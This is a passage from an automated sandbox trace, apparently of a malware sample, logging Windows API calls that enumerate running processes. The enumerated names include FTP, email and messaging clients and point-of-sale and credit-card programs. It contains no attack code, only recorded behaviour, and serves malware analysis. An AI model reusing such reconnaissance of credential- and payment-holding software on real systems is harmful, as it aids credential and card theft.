th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0200.680] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0200.785] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0200.788] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0200.790] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0200.796] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0200.798] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0200.801] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0200.803] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0200.805] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0200.807] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0200.814] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0200.817] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0200.819] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0200.821] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0200.827] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0200.829] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0200.832] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0200.834] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0200.836] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0200.889] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0200.892] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0200.893] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0200.895] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0200.897] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0200.898] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0200.900] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0200.905] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0200.908] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0200.910] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0200.912] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0200.914] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0200.916] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0200.921] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0200.923] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0200.925] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0200.927] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0200.929] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0200.931] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0200.948] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0200.951] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0200.953] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0200.955] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0200.957] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0200.959] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0200.960] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0200.962] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0200.968] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0200.970] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0200.972] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0200.974] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0200.976] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0200.978] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0200.983] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0200.985] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0200.987] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0200.989] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0200.990] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0200.992] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0200.994] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0201.032] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0201.034] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0201.036] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0201.038] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0201.039] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0201.041] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0201.046] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0201.048] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0201.049] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0201.051] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0201.053] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xccc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x500, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0201.055] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xccc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x500, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 0 [0201.057] CloseHandle (hObject=0x2274) returned 1 [0201.057] Sleep (dwMilliseconds=0x64) [0201.201] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2274 [0201.211] Process32First (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0201.212] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0201.297] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0201.298] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0201.300] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0201.301] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0201.303] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0201.304] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0201.306] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0201.308] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0201.312] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0201.313] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0201.315] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, 